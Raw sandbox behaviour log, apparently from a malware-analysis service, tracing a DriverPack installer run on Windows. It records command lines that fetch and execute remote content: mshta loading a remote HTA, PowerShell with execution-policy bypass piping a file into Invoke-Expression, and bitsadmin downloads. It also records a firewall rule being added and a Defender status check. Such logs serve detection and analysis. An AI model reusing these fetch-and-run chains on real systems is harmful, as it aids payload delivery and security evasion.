Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-MpComputerStatus
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /info dwnl-task-48795
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /info dwnl-task-48795
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" && echo %errorlevel% > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_runAsAdmin.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\system32\mshta.exe" "http://dwrapper-prod.herokuapp.com/bin/watcher.html
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\run.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} --sfx
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression" > "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stdout.log" 2> "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stderr.log
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 kernel32,Sleep
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_8360.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_84501.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_68896.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_68896.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_40078.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_40078.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_58899.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_58899.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_70521.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_70521.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.18362.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
